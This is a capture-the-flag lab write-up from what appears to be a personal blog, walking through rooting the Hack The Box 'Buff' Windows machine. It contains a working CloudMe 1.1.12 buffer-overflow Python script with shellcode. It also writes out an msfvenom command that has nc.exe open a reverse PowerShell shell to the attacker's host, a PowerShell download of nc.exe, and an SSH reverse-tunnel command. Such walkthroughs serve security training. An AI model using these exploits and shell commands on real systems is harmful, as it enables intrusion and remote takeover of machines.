Buff HTB Writeup

Walkthrough

To get started I have connected HTB's VPN and started pinged to 10.10.10.198 Buff Machine whether I could reach the machine.

Let's add IP 10.10.10.198 to our hosts

root@RajSec:~# nano/etc/hosts

10.10.10.198    buff.htb

Nmap Scan:

root@RajSec:~/Desktop/htb/buff# nmap -sC -sV -oN nmapscan.htb buff.htb

8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)

There is a port 8080 open and Running Service Apache httpd 2.4.43

Now let's have a look at website

They also mentioned Project Name in website http://buff.htb:8080/contact.php

After a quick search in DuckDuckGo I got exploit based on Unauthenticated Remote Code Execution

Exploit for Gym Management System 1.0 48506

Getting User

After running exploit

root@RajSec:~/Desktop/htb/buff# python 48506 http://buff.htb:8080/

Now I'm user shaun

I just downloaded nc.exe and lets upload nc.exe to get a reverse shell. So, I hosted the python server on my local machine

root@RajSec:~/Desktop/htb/buff# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Lets upload nc.exe to machine

C:\xampp\htdocs\gym\upload> powershell -c "wget 10.10.14.**/nc.exe -o nc.exe"

Getting User.txt

Privilege Escalation:

After searching every Directory I found CloudMe_1112.exe in Downloads

After quick Search I came to know CloudMe v1.1.12 is vulnerable to buffer overflow

Exploit for buffer overflow 48389

This exploit runs the application present on remote system

In our case we are going to run nc.exe to get reverse shell as Administrator

Let's generate Payload

root@RajSec:~/Desktop/htb/buff# msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.** 7890 -e powershell.exe' -b '\x00\x0A\x0D' -f python

CloudMe accepts 8888 as port. So, let's start tunnelling

For tunneling we need to upload plink.exe

Getting reverse connection from buff machine

I have another user in my Linux machine so I'll try to get revere connection from it

I need to restart ssh service in local machine

root@RajSec:~# service ssh restart

PS C:\xampp\htdocs\gym\upload> cmd
cmd
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>plink.exe -l "user" -pw "password" 10.10.14.** -R 8888:127.0.0.1:8888

Now it's time to run exploit

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
buf =  b""
buf += b"\xbd\xdb\xda\x78\xd4\xdb\xce\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x40\x83\xeb\xfc\x31\x6b\x0f\x03\x6b\xd4\x38"
buf += b"\x8d\x28\x02\x3e\x6e\xd1\xd2\x5f\xe6\x34\xe3\x5f\x9c"
buf += b"\x3d\x53\x50\xd6\x10\x5f\x1b\xba\x80\xd4\x69\x13\xa6"
buf += b"\x5d\xc7\x45\x89\x5e\x74\xb5\x88\xdc\x87\xea\x6a\xdd"
buf += b"\x47\xff\x6b\x1a\xb5\xf2\x3e\xf3\xb1\xa1\xae\x70\x8f"
buf += b"\x79\x44\xca\x01\xfa\xb9\x9a\x20\x2b\x6c\x91\x7a\xeb"
buf += b"\x8e\x76\xf7\xa2\x88\x9b\x32\x7c\x22\x6f\xc8\x7f\xe2"
buf += b"\xbe\x31\xd3\xcb\x0f\xc0\x2d\x0b\xb7\x3b\x58\x65\xc4"
buf += b"\xc6\x5b\xb2\xb7\x1c\xe9\x21\x1f\xd6\x49\x8e\x9e\x3b"
buf += b"\x0f\x45\xac\xf0\x5b\x01\xb0\x07\x8f\x39\xcc\x8c\x2e"
buf += b"\xee\x45\xd6\x14\x2a\x0e\x8c\x35\x6b\xea\x63\x49\x6b"
buf += b"\x55\xdb\xef\xe7\x7b\x08\x82\xa5\x11\xcf\x10\xd0\x57"
buf += b"\xcf\x2a\xdb\xc7\xb8\x1b\x50\x88\xbf\xa3\xb3\xed\x30"
buf += b"\xee\x9e\x47\xd9\xb7\x4a\xda\x84\x47\xa1\x18\xb1\xcb"
buf += b"\x40\xe0\x46\xd3\x20\xe5\x03\x53\xd8\x97\x1c\x36\xde"
buf += b"\x04\x1c\x13\x9d\x90\xbe\xe4\x43\x89\x4e\x65\xd8\x39"
buf += b"\xdb\xe1\x8f\xda\x50\xb6\x28\x65\xfa\x1a\xc2\xe5\x68"
buf += b"\xcc\x4d\x61\x2d\x7c\xed\x47\xa8\xf8\x94\xb7\x03\xc9"
buf += b"\x78\x86\x53\x07\xb4\xdc\xbd\x6f\x8f\x3c\xf5\xb7\xd6"
buf += b"\x0c\xd9\xea\x4d\x4c\x69\x9a\xfa\xe9\xfb\x17\x6d\x94"
buf += b"\x97\xbb\x43\x33\x10\x21\x9c"


overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + buf))	

buf1 = padding1 + EIP + NOPS + buf + overrun 

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(buf1)
except Exception as e:
	print(sys.exc_value)

After running Exploit we got shell

Connection from 10.10.10.198:49996.                                                                
Microsoft Windows [Version 10.0.17134.1610]         
(c) 2018 Microsoft Corporation. All rights reserved.                                                     
                                                    
C:\Windows\system32>whoami                                                                               
whoami                                              
buff\administrator

C:\Windows\system32>hostname
hostname
BUFF

We rooted Machine..

Subscribe Us

Buff HTB Writeup

Walkthrough

Post a Comment

0 Comments

Search This Blog

About Me

Facebook

Subscribe Us

Popular Posts

Luanne HTB Writeup

Recent Posts

Categories

Subscribe Us

Buff HTB Writeup

Walkthrough

You may like these posts

Post a Comment

0 Comments

Search This Blog

About Me

Social Plugin

Facebook

Subscribe Us

Popular Posts

Luanne HTB Writeup

Recent Posts

Categories